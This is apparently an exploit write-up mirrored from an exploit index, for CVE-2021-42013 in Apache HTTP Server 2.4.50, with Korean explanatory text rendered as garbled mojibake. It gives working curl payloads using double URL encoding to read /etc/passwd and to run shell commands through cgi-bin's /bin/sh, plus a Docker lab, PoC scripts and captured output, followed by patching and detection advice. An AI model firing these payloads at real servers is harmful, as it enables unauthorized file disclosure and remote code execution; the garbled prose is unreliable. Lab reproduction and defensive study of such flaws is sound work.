Share
## https://sploitus.com/exploit?id=8AF22FB3-A28B-5CF5-9FD3-D471384930F2
# CVE-2021-42013 - Apache HTTP Server 2.4.50 κ²½λ‘ μ‘°μ RCE
> μμ±: eunho87
> λ μ§: 2024λ
> CVSS Score: 9.8 (Critical)
## μμ½
Apache HTTP Server 2.4.50μμ URL κ²½λ‘ μ κ·ν μ²λ¦¬ μ€λ₯λ‘ μΈν΄ **μΈμ¦ μμ΄** μμ νμΌμ μ½κ±°λ μ격 μ½λλ₯Ό μ€νν μ μλ μ·¨μ½μ μ
λλ€. μ΄λ CVE-2021-41773μ λΆμμ ν ν¨μΉλ‘ μΈν΄ λ°μνμΌλ©°, **μ΄μ€ URL μΈμ½λ©(`%%32%65`)**μΌλ‘ κ²½λ‘ κ²μ¬λ₯Ό μ°νν©λλ€.
- **μν₯**: Apache 2.4.49~2.4.50
- **μΈμ¦**: λΆνμ (Pre-auth RCE)
- **CVSS**: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- **μμ ν¨μΉ**: 2.4.51 μ΄μ
---
## μ·¨μ½μ μμΈ λΆμ
### λ°μ μμΈ
Apache 2.4.49μμ κ²½λ‘ μ κ·ν μ½λ 리ν©ν°λ§ μ€ `../` νν°λ§ μ°ν λ²κ·Έ(41773) λ°μ
β 2.4.50μμ λ¨μΌ μΈμ½λ©(`.%2e`)λ§ μ°¨λ¨νμΌλ
β **μ΄μ€ μΈμ½λ©(`%%32%65`)μΌλ‘ μ¬μ°ν κ°λ₯** (42013)
### 곡격 μ리
```
1μ°¨ λμ½λ©: %%32%65 β %2e (κ²μ¬ ν΅κ³Ό)
2μ°¨ λμ½λ©: %2e β . (.. μμ± β νμΆ)
```
### μ·¨μ½ μ‘°κ±΄
1. `LoadModule cgid_module` νμ±ν (RCEμ©)
2. ``μμ `Require all granted` (νμΌ μ κ·Ό νμ©)
3. `Alias` λλ `ScriptAlias` κ²½λ‘ μ‘΄μ¬
---
## PoC μ½λ
### νμΌ μ½κΈ° (μ 보 μ μΆ)
```bash
curl -s --path-as-is \
"http://target:8080/static/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
```
### μ격 μ½λ μ€ν (RCE)
```bash
curl -s --path-as-is -X POST \
--data 'echo Content-Type: text/plain; echo; id; uname -a' \
"http://target:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
```
---
## νκ²½ κ΅¬μ± λ° μ€ν
### 1. νκ²½ κΈ°λ
```bash
git clone https://github.com/eunho87/CVE-2021-42013.git
cd CVE-2021-42013
docker compose up -d
```
### 2. 컨ν
μ΄λ νμΈ
```bash
docker compose ps
# cve-2021-42013 μ΄ Up μν νμΈ (ν¬νΈ 8080)
```
### 3. μλ κ²μ¦ (κΆμ₯)
```bash
python3 poc.py
```
**μΆλ ₯ μμ:**
```
[*] λμ μλ²(2.4.50): localhost:8080
[PASS] A. μ΄μ€μΈμ½λ©(CVE-2021-42013) νμΌμ½κΈ° μ±κ³΅
HTTP 200, 첫 μ€: root:x:0:0:root:/root:/bin/bash
[PASS] B. μ΄μ€μΈμ½λ©(CVE-2021-42013) μ격μ½λμ€ν μ±κ³΅
uid=1(daemon) gid=1(daemon) groups=1(daemon) | Linux ... x86_64 GNU/Linux
[+] μ 체 ν΅κ³Ό
```
### 4. μλ νμΈ
```bash
bash poc.sh
```
### 5. μ 리
```bash
docker compose down
```
---
## μ€ν κ²°κ³Ό
### νμΌ μ½κΈ° μ±κ³΅
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
```
### μ격 μ½λ μ€ν μ±κ³΅
```
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux 2dcf96c97a40 6.6.114.1-microsoft-standard-WSL2 x86_64 GNU/Linux
```
---
## νκ°
| νλͺ© | μ μ |
|---|---|
| **Reproducibility** | 95% |
| **Risk Score** | 9.8/10.0 |
**μ΄μ :**
- 곡μ μ΄λ―Έμ§ νκ·Έ κ³ μ (2.4.50) β λ²μ λ리ννΈ μμ
- μμ νμ€ λΌμ΄λΈλ¬λ¦¬ PoC (`http.client`, `curl`) β μΈλΆ μμ‘΄μ± 0
- λͺ¨λ νμΌ UTF-8 μΈμ½λ© β μΈμ½λ© μ€λ₯ μμ
- as-submitted μ¬νμ± 100% κ²μ¦ μλ£
---
## λμ λ°©μ
| μ‘°μΉ | μ€λͺ
|
|---|---|
| **μ
κ·Έλ μ΄λ** | Apache 2.4.51 μ΄μμΌλ‘ μ¦μ μ
λ°μ΄νΈ |
| **μ€μ μν** | ``μ `Require all denied` μ μ§ |
| **곡격면 μΆμ** | λΆνμν `mod_cgi` λΉνμ±ν |
| **νμ§** | λ‘κ·Έμμ `%%32%65`, `%2e` ν¨ν΄ λͺ¨λν°λ§ |
---
## μ°Έκ³
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-42013
- Apache 보μ 곡μ§: https://httpd.apache.org/security/vulnerabilities_24.html
- CVE-2021-41773: https://nvd.nist.gov/vuln/detail/CVE-2021-41773